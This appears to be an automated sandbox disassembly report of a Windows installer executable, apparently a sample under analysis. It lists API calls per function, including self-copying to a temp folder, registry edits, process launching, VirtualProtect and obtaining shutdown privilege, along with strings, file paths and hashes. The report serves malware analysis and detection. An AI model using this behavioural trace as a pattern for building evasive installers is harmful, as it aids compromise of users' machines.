5181 10001714 5179->5181 5182 10001272 2 API calls 5180->5182 5183 10001272 2 API calls 5181->5183 5184 10001737 GlobalFree 5182->5184 5185 1000171a GlobalFree 5183->5185 5184->5175 5186 1000174b GlobalFree 5184->5186 5185->5175 5186->5175 5187 401e77 5188 402c37 17 API calls 5187->5188 5189 401e7d 5188->5189 5190 402c37 17 API calls 5189->5190 5191 401e86 5190->5191 5192 402c37 17 API calls 5191->5192 5193 401e8f 5192->5193 5194 402c37 17 API calls 5193->5194 5195 401e98 5194->5195 5196 401423 24 API calls 5195->5196 5197 401e9f 5196->5197 5204 4058aa ShellExecuteExW 5197->5204 5199 401ee1 5200 40670d 5 API calls 5199->5200 5202 402885 5199->5202 5201 401efb CloseHandle 5200->5201 5201->5202 5204->5199 5205 10002238 5206 10002296 5205->5206 5207 100022cc 5205->5207 5206->5207 5208 100022a8 GlobalAlloc 5206->5208 5208->5206 5209 40167b 5210 402c37 17 API calls 5209->5210 5211 401682 5210->5211 5212 402c37 17 API calls 5211->5212 5213 40168b 5212->5213 5214 402c37 17 API calls 5213->5214 5215 401694 MoveFileW 5214->5215 5216 4016a0 5215->5216 5217 4016a7 5215->5217 5218 401423 24 API calls 5216->5218 5219 4065c5 2 API calls 5217->5219 5221 40224a 5217->5221 5218->5221 5220 4016b6 5219->5220 5220->5221 5222 406048 36 API calls 5220->5222 5222->5216 5223 1000103d 5224 1000101b 5 API calls 5223->5224 5225 10001056 5224->5225 4843 40247e 4844 402c77 17 API calls 4843->4844 4845 402488 4844->4845 4846 402c37 17 API calls 4845->4846 4847 402491 4846->4847 4848 40249c RegQueryValueExW 4847->4848 4851 402885 4847->4851 4849 4024c2 RegCloseKey 4848->4849 4850 4024bc 4848->4850 4849->4851 4850->4849 4854 4061c9 wsprintfW 4850->4854 4854->4849 5226 4020fe 5227 402c37 17 API calls 5226->5227 5228 402105 5227->5228 5229 402c37 17 API calls 5228->5229 5230 40210f 5229->5230 5231 402c37 17 API calls 5230->5231 5232 402119 5231->5232 5233 402c37 17 API calls 5232->5233 5234 402123 5233->5234 5235 402c37 17 API calls 5234->5235 5236 40212d 5235->5236 5237 40216c CoCreateInstance 
5236->5237 5238 402c37 17 API calls 5236->5238 5241 40218b 5237->5241 5238->5237 5239 401423 24 API calls 5240 40224a 5239->5240 5241->5239 5241->5240 5242 4019ff 5243 402c37 17 API calls 5242->5243 5244 401a06 5243->5244 5245 402c37 17 API calls 5244->5245 5246 401a0f 5245->5246 5247 401a16 lstrcmpiW 5246->5247 5248 401a28 lstrcmpW 5246->5248 5249 401a1c 5247->5249 5248->5249 3806 401f00 3821 402c37 3806->3821 3815 401f2b 3817 401f30 3815->3817 3818 401f3b 3815->3818 3816 402885 3846 4061c9 wsprintfW 3817->3846 3820 401f39 CloseHandle 3818->3820 3820->3816 3822 402c43 3821->3822 3847 4062a4 3822->3847 3825 401f06 3827 4052e6 3825->3827 3828 405301 3827->3828 3836 401f10 3827->3836 3829 40531d lstrlenW 3828->3829 3832 4062a4 17 API calls 3828->3832 3830 405346 3829->3830 3831 40532b lstrlenW 3829->3831 3834 405359 3830->3834 3835 40534c SetWindowTextW 3830->3835 3833 40533d lstrcatW 3831->3833 3831->3836 3832->3829 3833->3830 3834->3836 3837 40535f SendMessageW SendMessageW SendMessageW 3834->3837 3835->3834 3838 405867 CreateProcessW 3836->3838 3837->3836 3839 401f16 3838->3839 3840 40589a CloseHandle 3838->3840 3839->3816 3839->3820 3841 40670d WaitForSingleObject 3839->3841 3840->3839 3842 406727 3841->3842 3843 406739 GetExitCodeProcess 3842->3843 3889 406698 3842->3889 3843->3815 3846->3820 3848 4062b1 3847->3848 3849 4064fc 3848->3849 3852 4064ca lstrlenW 3848->3852 3855 4062a4 10 API calls 3848->3855 3857 4063df GetSystemDirectoryW 3848->3857 3858 4063f2 GetWindowsDirectoryW 3848->3858 3859 406516 5 API calls 3848->3859 3860 406426 SHGetSpecialFolderLocation 3848->3860 3861 4062a4 10 API calls 3848->3861 3862 40646d lstrcatW 3848->3862 3873 406150 3848->3873 3878 4061c9 wsprintfW 3848->3878 3879 406282 lstrcpynW 3848->3879 3850 402c64 3849->3850 3880 406282 lstrcpynW 3849->3880 3850->3825 3864 406516 3850->3864 3852->3848 3855->3852 3857->3848 3858->3848 3859->3848 3860->3848 3863 40643e SHGetPathFromIDListW CoTaskMemFree 3860->3863 3861->3848 3862->3848 
3863->3848 3871 406523 3864->3871 3865 406599 3866 40659e CharPrevW 3865->3866 3868 4065bf 3865->3868 3866->3865 3867 40658c CharNextW 3867->3865 3867->3871 3868->3825 3870 406578 CharNextW 3870->3871 3871->3865 3871->3867 3871->3870 3872 406587 CharNextW 3871->3872 3885 405b80 3871->3885 3872->3867 3881 4060ef 3873->3881 3876 406184 RegQueryValueExW RegCloseKey 3877 4061b4 3876->3877 3877->3848 3878->3848 3879->3848 3880->3850 3882 4060fe 3881->3882 3883 406102 3882->3883 3884 406107 RegOpenKeyExW 3882->3884 3883->3876 3883->3877 3884->3883 3886 405b86 3885->3886 3887 405b9c 3886->3887 3888 405b8d CharNextW 3886->3888 3887->3871 3888->3886 3890 4066b5 PeekMessageW 3889->3890 3891 4066c5 WaitForSingleObject 3890->3891 3892 4066ab DispatchMessageW 3890->3892 3891->3842 3892->3890 5250 401000 5251 401037 BeginPaint GetClientRect 5250->5251 5252 40100c DefWindowProcW 5250->5252 5254 4010f3 5251->5254 5255 401179 5252->5255 5256 401073 CreateBrushIndirect FillRect DeleteObject 5254->5256 5257 4010fc 5254->5257 5256->5254 5258 401102 CreateFontIndirectW 5257->5258 5259 401167 EndPaint 5257->5259 5258->5259 5260 401112 6 API calls 5258->5260 5259->5255 5260->5259 4177 100027c2 4178 10002812 4177->4178 4179 100027d2 VirtualProtect 4177->4179 4179->4178 5261 401503 5262 40150b 5261->5262 5264 40151e 5261->5264 5263 402c15 17 API calls 5262->5263 5263->5264 4215 402306 4216 40230e 4215->4216 4219 402314 4215->4219 4217 402c37 17 API calls 4216->4217 4217->4219 4218 402322 4221 402330 4218->4221 4222 402c37 17 API calls 4218->4222 4219->4218 4220 402c37 17 API calls 4219->4220 4220->4218 4223 402c37 17 API calls 4221->4223 4222->4221 4224 402339 WritePrivateProfileStringW 4223->4224 5265 401f86 5266 402c37 17 API calls 5265->5266 5267 401f8d 5266->5267 5268 40665c 5 API calls 5267->5268 5269 401f9c 5268->5269 5270 401fb8 GlobalAlloc 5269->5270 5271 402020 5269->5271 5270->5271 5272 401fcc 5270->5272 5273 40665c 5 API calls 5272->5273 5274 401fd3 5273->5274 5275 40665c 5 API 
calls 5274->5275 5276 401fdd 5275->5276 5276->5271 5280 4061c9 wsprintfW 5276->5280 5278 402012 5281 4061c9 wsprintfW 5278->5281 5280->5278 5281->5271 4232 402388 4233 402390 4232->4233 4234 4023bb 4232->4234 4244 402c77 4233->4244 4236 402c37 17 API calls 4234->4236 4238 4023c2 4236->4238 4249 402cf5 4238->4249 4239 4023a1 4241 402c37 17 API calls 4239->4241 4242 4023a8 RegDeleteValueW RegCloseKey 4241->4242 4243 4023cf 4242->4243 4245 402c37 17 API calls 4244->4245 4246 402c8e 4245->4246 4247 4060ef RegOpenKeyExW 4246->4247 4248 402397 4247->4248 4248->4239 4248->4243 4250 402d0b 4249->4250 4251 402d21 4250->4251 4253 402d2a 4250->4253 4251->4243 4254 4060ef RegOpenKeyExW 4253->4254 4255 402d58 4254->4255 4256 402dd0 4255->4256 4263 402d5c 4255->4263 4256->4251 4257 402d7e RegEnumKeyW 4258 402d95 RegCloseKey 4257->4258 4257->4263 4260 40665c 5 API calls 4258->4260 4259 402db6 RegCloseKey 4259->4256 4262 402da5 4260->4262 4261 402d2a 6 API calls 4261->4263 4264 402dc4 RegDeleteKeyW 4262->4264 4265 402da9 4262->4265 4263->4257 4263->4258 4263->4259 4263->4261 4264->4256 4265->4256 5282 40190c 5283 401943 5282->5283 5284 402c37 17 API calls 5283->5284 5285 401948 5284->5285 5286 405990 67 API calls 5285->5286 5287 401951 5286->5287 5288 401d0e 5289 402c15 17 API calls 5288->5289 5290 401d15 5289->5290 5291 402c15 17 API calls 5290->5291 5292 401d21 GetDlgItem 5291->5292 5293 40258c 5292->5293 5294 1000164f 5295 10001516 GlobalFree 5294->5295 5297 10001667 5295->5297 5296 100016ad GlobalFree 5297->5296 5298 10001682 5297->5298 5299 10001699 VirtualFree 5297->5299 5298->5296 5299->5296 5300 40190f 5301 402c37 17 API calls 5300->5301 5302 401916 5301->5302 5303 4058e4 MessageBoxIndirectW 5302->5303 5304 40191f 5303->5304 5305 401491 5306 4052e6 24 API calls 5305->5306 5307 401498 5306->5307 5308 402592 5309 4025c1 5308->5309 5310 4025a6 5308->5310 5312 4025f5 5309->5312 5313 4025c6 5309->5313 5311 402c15 17 API calls 5310->5311 5318 4025ad 5311->5318 5314 402c37 17 API 

                                                              Control-flow Graph: function at 00403373 (graph image with executed / not executed paths not reproduced)
                                                              APIs
                                                              • SetErrorMode.KERNELBASE ref: 00403396
                                                              • GetVersion.KERNEL32 ref: 0040339C
                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
                                                              • OleInitialize.OLE32(00000000), ref: 00403413
                                                              • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
                                                              • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\450707124374000811.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\450707124374000811.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E
                                                                • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035D5
                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F1
                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
                                                              • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E
                                                                • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
                                                              • ExitProcess.KERNEL32 ref: 0040370A
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\450707124374000811.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371D
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\450707124374000811.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372C
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\450707124374000811.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\450707124374000811.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
                                                              • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\450707124374000811.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037CD
                                                              • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403830
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403868
                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
                                                              • ExitProcess.KERNEL32 ref: 004038B0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                              • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$C:\Users\user\Desktop$C:\Users\user\Desktop\450707124374000811.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                              • API String ID: 2488574733-1279917723
                                                              • Opcode ID: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                              • Instruction ID: 7b86b6c626ebcb02b9d5dbe90ebec93722fb19806190c38ba91b5de258dcc2d7
                                                              • Opcode Fuzzy Hash: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                              • Instruction Fuzzy Hash: 0CD12571500310ABD720BF759D45A2B3AACEB4070AF11487FF981B62E1DB7D8E45876E

                                                              Control-flow Graph: function at 00404C62 (graph image with executed / not executed paths not reproduced)
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404C7A
                                                              • GetDlgItem.USER32(?,00000408), ref: 00404C85
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCF
                                                              • LoadBitmapW.USER32(0000006E), ref: 00404CE2
                                                              • SetWindowLongW.USER32(?,000000FC,0040525A), ref: 00404CFB
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0F
                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D21
                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404D37
                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D43
                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D55
                                                              • DeleteObject.GDI32(00000000), ref: 00404D58
                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D83
                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8F
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E25
                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E50
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E64
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404E93
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA1
                                                              • ShowWindow.USER32(?,00000005), ref: 00404EB2
                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAF
                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405014
                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405029
                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040504D
                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040506D
                                                              • ImageList_Destroy.COMCTL32(?), ref: 00405082
                                                              • GlobalFree.KERNEL32(?), ref: 00405092
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040510B
                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 004051B4
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C3
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E3
                                                              • ShowWindow.USER32(?,00000000), ref: 00405231
                                                              • GetDlgItem.USER32(?,000003FE), ref: 0040523C
                                                              • ShowWindow.USER32(00000000), ref: 00405243
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $M$N
                                                              • API String ID: 1638840714-813528018
                                                              • Opcode ID: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                              • Instruction ID: ace54df752983209bd77257c2b819bbd2f8b8ae60686516a6448f39b7f2ae2b0
                                                              • Opcode Fuzzy Hash: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                              • Instruction Fuzzy Hash: E50270B0900209EFDB109FA4DD85AAE7BB5FB84314F10817AF650BA2E1D7799D42CF58

                                                              Control-flow Graph

                                                              APIs
                                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 004059B9
                                                              • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A01
                                                              • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A24
                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A2A
                                                              • FindFirstFileW.KERNELBASE(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A3A
                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
                                                              • FindClose.KERNEL32(00000000), ref: 00405AE9
                                                              Strings
                                                              • "C:\Users\user\Desktop\450707124374000811.exe", xrefs: 00405990
                                                              • \*.*, xrefs: 004059FB
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040599E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                              • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                              • API String ID: 2035342205-1482899044
                                                              • Opcode ID: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                              • Instruction ID: f2c7612d72ec45a398f238805cdec5f3e53338685f49ce317d80e039c8d46841
                                                              • Opcode Fuzzy Hash: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                              • Instruction Fuzzy Hash: 4E41C230A01A14AACB21AB658C89AAF7778DF81764F14427FF801711C1D77CA992DE6E
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CA4,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,75923420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 004065D0
                                                              • FindClose.KERNEL32(00000000), ref: 004065DC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                              • Instruction ID: c6d438537f48b5b2fd9a798109b403d1ef13146c040350fe47557a90c5bdf24f
                                                              • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                              • Instruction Fuzzy Hash: E6D012315091206BC6551B387E0C84B7A589F153717258B37B86AF11E4C734CC628698

                                                              Control-flow Graph

                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
                                                              • ShowWindow.USER32(?), ref: 00403D97
                                                              • DestroyWindow.USER32 ref: 00403DAB
                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
                                                              • GetDlgItem.USER32(?,?), ref: 00403DE8
                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
                                                              • IsWindowEnabled.USER32(00000000), ref: 00403E03
                                                              • GetDlgItem.USER32(?,00000001), ref: 00403EB1
                                                              • GetDlgItem.USER32(?,00000002), ref: 00403EBB
                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F26
                                                              • GetDlgItem.USER32(?,00000003), ref: 00403FCC
                                                              • ShowWindow.USER32(00000000,?), ref: 00403FED
                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
                                                              • EnableWindow.USER32(?,?), ref: 0040401A
                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404030
                                                              • EnableMenuItem.USER32(00000000), ref: 00404037
                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040404F
                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
                                                              • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
                                                              • SetWindowTextW.USER32(?,0042D248), ref: 004040A0
                                                              • ShowWindow.USER32(?,0000000A), ref: 004041D4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                              • String ID:
                                                              • API String ID: 3282139019-0
                                                              • Opcode ID: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                              • Instruction ID: 2b8d66c2e1a38ac8fa8a62e4dcdff4cf04ad9fa750ea4aef2484392c4ac96c84
                                                              • Opcode Fuzzy Hash: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                              • Instruction Fuzzy Hash: 3EC1D2B1600200AFDB216F61ED89E2B3A68FB94706F04057EF641B51F1CB799982DB6D

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                              • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\450707124374000811.exe",00000000), ref: 00403A11
                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
                                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\pechay\transskribere\jon), ref: 00403AF8
